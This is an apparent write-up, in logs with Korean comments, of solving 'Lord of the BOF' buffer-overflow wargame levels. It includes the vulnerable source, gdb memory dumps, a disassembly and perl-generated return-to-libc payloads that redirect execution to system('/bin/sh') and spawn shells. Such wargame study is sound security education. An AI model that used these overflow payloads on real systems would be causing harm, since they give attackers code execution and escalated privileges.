0xbffff494:     0x00000000      0x40018000      0x0000005e      0xbfffe3fc

0xbffff4a4:     0xbfffe400      0xbfffe404      0xbfffe408      0xbfffe40c

0xbffff4b4:     0xbfffe410      0xbfffe548      0x00000000      0x00000000

0xbffff4c4:     0x00002fb2      0x00001000      0x00000018      0x535975ed

0xbffff4d4:     0x0000385c      0x400143e0      0x00000018      0x000ed9c0

0xbffff4e4:     0x00000002      0xbfffe414      0xbfffe3e4      0xbfffe45c

0xbffff4f4:     0x00001000      0xbfffe45c      0x00000003      0x000f485c

(gdb)

0xbffff504:     0xbfffe530      0xbfffe490      0x40013ed0      0x00000808

0xbffff514:     0x00000000      0x00000000      0x0000675b      0x000081a4

0xbffff524:     0x00000001      0x00000000      0x00000000      0x00000808

0xbffff534:     0x00000000      0x00000000      0x40001402      0xbffff610

0xbffff544:     0x400081e6      0x400013e1      0x400013e1      0x40013868

0xbffff554:     0x400013a5      0x20730824      0xffffffff      0xffffffcf

0xbffff564:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff574:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff584:     0xbffffab0      0x00000000      0xbffff614      0x40000814

0xbffff594:     0x00000052      0x00000000      0x00000000      0x00000001

(gdb) x/40wx $esp-500

0xbffffa40:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffa50:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffa60:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffa70:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffa80:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffa90:     0x00000000      0x40029b0e      0xbffff8f4      0x400081e6

0xbffffaa0:     0x40029ad5      0x40029ad5      0x40013868      0x400143e0

0xbffffab0:     0x00006805      0x00000203      0x00000203      0x00000203

0xbffffac0:     0x00000006      0x08048034      0x08048390      0xbffff87c

0xbffffad0:     0x40002179      0x00006120      0x4000220c      0x08048390

(gdb)

0xbffffae0:     0x00000000      0x00000000      0x40020e90      0x00000612

0xbffffaf0:     0x40021fd0      0x4001ad70      0x400143e0      0x00000003

0xbffffb00:     0x40014650      0x00000001      0xbffff8ac      0x00000000

0xbffffb10:     0x4003ec68      0x00000000      0x00000000      0x00000000

0xbffffb20:     0x40029b0e      0xbffff8f4      0x400081e6      0x40029ad5

0xbffffb30:     0x40029ad5      0x40013868      0x400143e0      0x00006805

0xbffffb40:     0x00000203      0x00000203      0x00000203      0x00000006

0xbffffb50:     0x08048034      0x08048390      0xbffff87c      0x40002179

0xbffffb60:     0x00006120      0x4000220c      0x08048390      0x00000000

0xbffffb70:     0x00000000      0x40020e90      0x00000612      0x40021fd0

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "AAAA"'`

AAAA@BBBBù¿@(ü ¿AAAA

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@(ü ¿AAAA'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/60wx $esp-60

0xbffffaa4:     0x080484dc      0x0804857e      0xbffffab0      0x41414141

0xbffffab4:     0x40058ae0      0x42424242      0x400fbff9      0x90909090

0xbffffac4:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffad4:     0x90909090      0xbffffc28      0x41414141      0x00000002

0xbffffae4:     0xbffffb24      0xbffffb30      0x40013868      0x00000002

0xbffffaf4:     0x08048390      0x00000000      0x080483b1      0x08048440

0xbffffb04:     0x00000002      0xbffffb24      0x080482e4      0x0804851c

0xbffffb14:     0x4000ae60      0xbffffb1c      0x40013e90      0x00000002

0xbffffb24:     0xbffffc16      0xbffffc28      0x00000000      0xbffffc59

0xbffffb34:     0xbffffc6c      0xbffffc84      0xbffffca3      0xbffffcc5

0xbffffb44:     0xbffffcd3      0xbffffe96      0xbffffeb5      0xbffffed3

0xbffffb54:     0xbffffee8      0xbfffff08      0xbfffff13      0xbfffff24

0xbffffb64:     0xbfffff2c      0xbfffff36      0xbfffff46      0xbfffff54

0xbffffb74:     0xbfffff62      0xbfffff73      0xbfffff7e      0xbfffff92

0xbffffb84:     0xbfffffd6      0x00000000      0x00000003      0x08048034

(gdb) x/wx 0xbffffaaf

0xbffffaaf:     0x414141bf

(gdb) x/wx 0xbffffaae

0xbffffaae:     0x4141bfff

(gdb) x/wx 0xbffffab1

0xbffffab1:     0xe0414141

(gdb) x/wx 0xbffffab0

0xbffffab0:     0x41414141

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ q

sh: q: command not found

bash$ exit

exit

Segmentation fault (core dumped)

[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ my-pass

euid = 516

-해당 소스-

[assassin@localhost assassin]$ cat foo.c

main(){

        char *p;

        p = 0x4002c000;

        while (1) {

                while (*p++ != '/') ;

                if (strcmp(p-1, "/bin/sh") == 0) {

                        printf("0x%08x\n", p-1);

                        return 0;

                }

        }

}

[giant@localhost giant]$ ls

assassas  assassin  assassin.c  core

[giant@localhost giant]$ cat assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - assassin

        - no stack, no RTL

*/

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

        char buffer[40];

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        if(argv[1][47] == '\xbf')

        {

                printf("stack retbayed you!\n");

                exit(0);

        }

        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }                                                                    

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

        // buffer+sfp hunter

        memset(buffer, 0, 44);

}

/*소스를 보게되면 retbayed you라 하는데 이게 힌트같아보입니다. 잘 분석해보면 ret만 남습니다. ret는 변조할 수 있는것이죠! 근데 library에 들어있는 함수도 못쓰고 스택에 있는것도 못씁니다.. (막막)*/

[giant@localhost giant]$gdb -q

(gdb) p 0xbfffffff-0xbeffffff

$1 = 16777216

(gdb) zz

Undefined command: "zz".  Try "help". 

(gdb) q

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x16777216'` 

bash: ./assassas: Argument list too long // 꼼수시도해보려다가 망함ㅋ될리가 없죠..

[giant@localhost giant]$ [a]x44, [ret func]4bytes, [ret]<-system, [dummy], [/bin/sh]

bash: -system,: No such file or directory

[giant@localhost giant]$ bash2

[giant@localhost giant]$ gdb -q assassas

(gdb) b main

Breakpoint 1 at 0x8048476

(gdb) r

Starting program: /home/giant/assassas

Breakpoint 1, 0x8048476 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[giant@localhost giant]$ export BINSH=/bin/sh

[giant@localhost giant]$ vi whereis.c

[giant@localhost giant]$ gcc whereis.c -o getenv

whereis.c: In function `main':

whereis.c:5: warning: assignment makes pointer from integer without a cast

[giant@localhost giant]$ ./getenv BINSH

env is at: 0xbffffc88

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\xff\xff\xff\xff", "\xe0\x8a\x05\x40", "B"x4, "\x88\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    @BBBBˆü ¿

Segmentation fault (core dumped)

[giant@localhost giant]$ gdb -q assassas core

Core was generated by `./assassas AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    @BBBBˆü ¿'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xffffffff in ?? ()

(gdb) disas main

Dump of assembler code for function main:

0x8048470 <main>:       push   %ebp

0x8048471 <main+1>:     mov    %esp,%ebp

0x8048473 <main+3>:     sub    $0x28,%esp

0x8048476 <main+6>:     cmpl   $0x1,0x8(%ebp)

0x804847a <main+10>:    jg     0x8048493 <main+35>

0x804847c <main+12>:    push   $0x8048570

0x8048481 <main+17>:    call   0x8048378 <printf>

0x8048486 <main+22>:    add    $0x4,%esp

0x8048489 <main+25>:    push   $0x0

0x804848b <main+27>:    call   0x8048388 <exit>

0x8048490 <main+32>:    add    $0x4,%esp

0x8048493 <main+35>:    mov    0xc(%ebp),%eax

0x8048496 <main+38>:    add    $0x4,%eax

0x8048499 <main+41>:    mov    (%eax),%edx

0x804849b <main+43>:    add    $0x2f,%edx

0x804849e <main+46>:    cmpb   $0xbf,(%edx)

0x80484a1 <main+49>:    jne    0x80484c0 <main+80>

0x80484a3 <main+51>:    push   $0x804857c

0x80484a8 <main+56>:    call   0x8048378 <printf>

0x80484ad <main+61>:    add    $0x4,%esp

0x80484b0 <main+64>:    push   $0x0

0x80484b2 <main+66>:    call   0x8048388 <exit>

0x80484b7 <main+71>:    add    $0x4,%esp

0x80484ba <main+74>:    lea    0x0(%esi),%esi

0x80484c0 <main+80>:    mov    0xc(%ebp),%eax

0x80484c3 <main+83>:    add    $0x4,%eax

0x80484c6 <main+86>:    mov    (%eax),%edx

0x80484c8 <main+88>:    add    $0x2f,%edx

---Type <return> to continue, or q <return> to quit---

0x80484cb <main+91>:    cmpb   $0x40,(%edx)

0x80484ce <main+94>:    jne    0x80484e7 <main+119>

0x80484d0 <main+96>:    push   $0x8048591

0x80484d5 <main+101>:   call   0x8048378 <printf>

0x80484da <main+106>:   add    $0x4,%esp

0x80484dd <main+109>:   push   $0x0

0x80484df <main+111>:   call   0x8048388 <exit>

0x80484e4 <main+116>:   add    $0x4,%esp

0x80484e7 <main+119>:   mov    0xc(%ebp),%eax

0x80484ea <main+122>:   add    $0x4,%eax

0x80484ed <main+125>:   mov    (%eax),%edx

0x80484ef <main+127>:   push   %edx

0x80484f0 <main+128>:   lea    0xffffffd8(%ebp),%eax

0x80484f3 <main+131>:   push   %eax

0x80484f4 <main+132>:   call   0x80483a8 <strcpy>

0x80484f9 <main+137>:   add    $0x8,%esp

0x80484fc <main+140>:   lea    0xffffffd8(%ebp),%eax

0x80484ff <main+143>:   push   %eax

0x8048500 <main+144>:   push   $0x80485ae

0x8048505 <main+149>:   call   0x8048378 <printf>

0x804850a <main+154>:   add    $0x8,%esp

0x804850d <main+157>:   push   $0x2c

0x804850f <main+159>:   push   $0x0

0x8048511 <main+161>:   lea    0xffffffd8(%ebp),%eax

0x8048514 <main+164>:   push   %eax

0x8048515 <main+165>:   call   0x8048398 <memset>

0x804851a <main+170>:   add    $0xc,%esp

0x804851d <main+173>:   leave

0x804851e <main+174>:   ret

---Type <return> to continue, or q <return> to quit---q

(gdb) q

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x88\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBBˆü ¿

sh: /sh: No such file or directory

Segmentation fault (core dumped)

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x84\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBB„ü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[giant@localhost giant]$ ./assassin `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x84\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBB„ü ¿

bash$ my-pass

euid = 515